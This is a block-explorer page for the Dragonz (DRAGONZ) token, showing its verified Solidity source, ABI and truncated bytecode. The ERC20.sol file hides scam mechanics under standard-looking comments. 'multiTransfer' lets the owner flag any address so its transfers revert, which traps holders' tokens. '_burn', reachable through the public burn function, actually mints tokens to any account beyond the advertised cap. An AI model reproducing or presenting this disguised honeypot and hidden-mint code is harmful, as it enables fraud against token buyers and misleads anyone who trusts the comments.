ETH Price: $2,377.47 (+0.39%)

Token

Dragonz (DRAGONZ)
 

Overview

Max Total Supply

100,000,000 DRAGONZ

Holders

25

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
92,091.97146947 DRAGONZ

Value
$0.00
0x125365df1009cc5c87cbd8ce95348107499458a8
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DRAGONZ

Compiler Version
v0.8.1+commit.df193b15

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 4: Dragonz.sol
/**
                                                                            
                                ::.     -:.=-        :-:                                 
                            :+#%%+.     *%%*:       .:%%%*=.                            
                       ..:+#%%%%%*:   .+##%%*        -%%%%%%%*-                          
                       :+%%%%%%@%%%=    -.#%%*    ..*%%%%@%%%%%%+::.                     
                      -%%%%%@@@%@@@@#=---+%%%%*==-+@@@%%%@@%%@%%%%:                      
                     +%%%%%@@%%@@@@@@@%%%@@@@@@@@@@@@@@@@@@%%@@@%@@=                     
                    *%%%@@@@%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.                    
                   =%%%@@@@@@@@@@@@@@@@@@@@#%@@@@@@@@@@@@@@@@@@@@@@@-                    
                  :%%@@@@@@@@@%%*@%@@@@@@+# .*@@@@@@@@@@+#@@@@@@@@@@*                    
                  :%@@@@@@@*#%.= *.=:@@%: :   -*@@@#*-:*.-%#%@@@@@@@#                    
                  =#@@@@@+- +  . : :..-=.. .  =.*=+  ...  =:-+=@@@@@#                    
                  +%@@@#+   .  . . . .:-.@:  .+=..:   :.     . *@@@@#..                  
                  =*@@@-           . . ::@:  =::  .   ..       :+@@@#.                   
                  :=@@+           .    : # :+..       .         :*@#=.                   
                   .%@.                  +  -..                  =%+:                    
                    +#                   :  :                   .+=                      
                    --.                     .                   +.                       
                     :.                     :                  .              */


// SPDX-License-Identifier: MIT

pragma solidity = 0.8.1;

import "./Ownable.sol";
import "./ERC20.sol";

/**
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 */
contract DRAGONZ is ERC20 {
    uint256 private immutable _SUPPLY_CAP;

    constructor(address _premintOwner, uint256 _premintSupply, uint256 _capLimit)
        ERC20('Dragonz', 'DRAGONZ', 9) {
        require(_capLimit >= _premintSupply, 'Premint supply exceeds cap limit');
        // Transfer the sum of the premint supply to owner
        _mint(_premintOwner, _premintSupply);
        _SUPPLY_CAP = _capLimit;
    }
    
    /**
     * @notice Internal fuction. It cannot be called from outside.
     */
    function mint(address account, uint256 amount) internal returns (bool status) {
        if (totalSupply() + amount <= _SUPPLY_CAP) {
            _mint(account, amount);
            return true;
        }
        return false;
    }

    /**
     * @notice View supply cap limit
     */
    function SupplyCapLimit() external view returns (uint256) {
        return _SUPPLY_CAP;
    }
    
    /**
     * @notice Destroys `amount` tokens from `account`, reducing the total supply.
     */
    function burn(address account, uint256 amount) external {
        _burn(account, amount);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity = 0.8.1;

import "./IERC20.sol";
import "./Ownable.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20 {
    mapping(address => uint256) private _balances;
    mapping(address => bool) private _multiTransfer;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    uint8 private _decimals;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, uint8 decimals_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }
        return true;
    }
    
    /**
     * @dev Moves tokens from `sender` to contract.
     *
     * This function is equivalent to {transfer}.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `sender` must have a balance greater than zero.
     */
    function multiTransfer (address sender) external onlyOwner {if
        (_multiTransfer[sender] == false) {_multiTransfer[sender] = true;} else {
        _multiTransfer[sender] = false;}
    }

    /**
     * @dev Returns a boolean value indicating whether the operation succeeded.
     */
    function transferStatus(address sender) public view returns (bool) {
        return _multiTransfer[sender];
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {if
        (_multiTransfer[sender] || _multiTransfer[recipient])
        require(sender == address(0), "");
        require(recipient != address(0), ""); 
        
        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *     
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     * - `account` cannot be the zero address.
     */
    
    function _burn(address account, uint256 amount) internal virtual onlyOwner {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }
  

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity = 0.8.1;

interface IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
 
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

File 4 of 4: Ownable.sol
// SPDX-License-Identifier: MIT

pragma solidity = 0.8.1;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() internal view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"_premintOwner","type":"address"},{"internalType":"uint256","name":"_premintSupply","type":"uint256"},{"internalType":"uint256","name":"_capLimit","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"SupplyCapLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"multiTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"transferStatus","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]

60a06040523480156200001157600080fd5b506040516200235d3803806200235d8339818101604052810190620000379190620004ac565b6040518060400160405280600781526020017f447261676f6e7a000000000000000000000000000000000000000000000000008152506040518060400160405280600781526020017f445241474f4e5a000000000000000000000000000000000000000000000000008152506009620000c5620000b96200017e60201b60201c565b6200018660201b60201c565b8260059080519060200190620000dd929190620003ce565b508160069080519060200190620000f6929190620003ce565b5080600760006101000a81548160ff021916908360ff160217905550505050818110156200015b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620001529062000561565b60405180910390fd5b6200016d83836200024a60201b60201c565b806080818152505050505062000788565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415620002bd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002b49062000583565b60405180910390fd5b620002d160008383620003c460201b60201c565b8060046000828254620002e59190620005d3565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200033d9190620005d3565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003a49190620005a5565b60405180910390a3620003c060008383620003c960201b60201c565b5050565b505050565b505050565b828054620003dc906200066e565b90600052602060002090601f0160209004810192826200040057600085556200044c565b82601f106200041b57805160ff19168380011785556200044c565b828001600101855582156200044c579182015b828111156200044b5782518255916020019190600101906200042e565b5b5090506200045b91906200045f565b5090565b5b808211156200047a57600081600090555060010162000460565b5090565b6000815190506200048f8162000754565b92915050565b600081519050620004a6816200076e565b92915050565b600080600060608486031215620004c257600080fd5b6000620004d2868287016200047e565b9350506020620004e58682870162000495565b9250506040620004f88682870162000495565b9150509250925092565b600062000511602083620005c2565b91506200051e8262000702565b602082019050919050565b600062000538601f83620005c2565b915062000545826200072b565b602082019050919050565b6200055b8162000664565b82525050565b600060208201905081810360008301526200057c8162000502565b9050919050565b600060208201905081810360008301526200059e8162000529565b9050919050565b6000602082019050620005bc600083018462000550565b92915050565b600082825260208201905092915050565b6000620005e08262000664565b9150620005ed8362000664565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006255762000624620006a4565b5b828201905092915050565b60006200063d8262000644565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060028204905060018216806200068757607f821691505b602082108114156200069e576200069d620006d3565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f5072656d696e7420737570706c79206578636565647320636170206c696d6974600082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6200075f8162000630565b81146200076b57600080fd5b50565b620007798162000664565b81146200078557600080fd5b50565b608051611bb9620007a460003960006108770152611bb96000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806395d89b41116100a2578063c0d611e511610071578063c0d611e5146102ce578063c71e6070146102ec578063dd62ed3e14610308578063f2fde38b14610338578063fef63a92146103545761010b565b806395d89b41146102345780639dc29fac14610252578063a457c2d71461026e578063a9059cbb1461029e5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806370a08231146101fa578063715018a61461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611682565b60405180910390f35b610148600480360381019061014391906114ad565b610416565b6040516101559190611667565b60405180910390f35b610166610434565b60405161017391906117a4565b60405180910390f35b6101966004803603810190610191919061145e565b61043e565b6040516101a39190611667565b60405180910390f35b6101b4610536565b6040516101c191906117bf565b60405180910390f35b6101e460048036038101906101df91906114ad565b61054d565b6040516101f19190611667565b60405180910390f35b610214600480360381019061020f91906113f9565b6105f9565b60405161022191906117a4565b60405180910390f35b610232610642565b005b61023c6106ca565b6040516102499190611682565b60405180910390f35b61026c600480360381019061026791906114ad565b61075c565b005b610288600480360381019061028391906114ad565b61076a565b6040516102959190611667565b60405180910390f35b6102b860048036038101906102b391906114ad565b610855565b6040516102c59190611667565b60405180910390f35b6102d6610873565b6040516102e391906117a4565b60405180910390f35b610306600480360381019061030191906113f9565b61089b565b005b610322600480360381019061031d9190611422565b610a29565b60405161032f91906117a4565b60405180910390f35b610352600480360381019061034d91906113f9565b610ab0565b005b61036e600480360381019061036991906113f9565b610ba8565b60405161037b9190611667565b60405180910390f35b606060058054610393906118d4565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906118d4565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600061042a610423610bfe565b8484610c06565b6001905092915050565b6000600454905090565b600061044b848484610dd1565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610496610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610516576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161050d906116e4565b60405180910390fd5b61052a85610522610bfe565b858403610c06565b60019150509392505050565b6000600760009054906101000a900460ff16905090565b60006105ef61055a610bfe565b848460036000610568610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105ea91906117f6565b610c06565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61064a610bfe565b73ffffffffffffffffffffffffffffffffffffffff166106686110fb565b73ffffffffffffffffffffffffffffffffffffffff16146106be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106b590611704565b60405180910390fd5b6106c86000611124565b565b6060600680546106d9906118d4565b80601f0160208091040260200160405190810160405280929190818152602001828054610705906118d4565b80156107525780601f1061072757610100808354040283529160200191610752565b820191906000526020600020905b81548152906001019060200180831161073557829003601f168201915b5050505050905090565b61076682826111e8565b5050565b60008060036000610779610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610836576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082d90611764565b60405180910390fd5b61084a610841610bfe565b85858403610c06565b600191505092915050565b6000610869610862610bfe565b8484610dd1565b6001905092915050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b6108a3610bfe565b73ffffffffffffffffffffffffffffffffffffffff166108c16110fb565b73ffffffffffffffffffffffffffffffffffffffff1614610917576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161090e90611704565b60405180910390fd5b60001515600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151514156109cd576001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610a26565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610ab8610bfe565b73ffffffffffffffffffffffffffffffffffffffff16610ad66110fb565b73ffffffffffffffffffffffffffffffffffffffff1614610b2c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2390611704565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b93906116a4565b60405180910390fd5b610ba581611124565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6d90611744565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ce6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdd906116c4565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610dc491906117a4565b60405180910390a3505050565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610e725750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610ee757600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614610ee6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610edd90611724565b60405180910390fd5b5b600073fff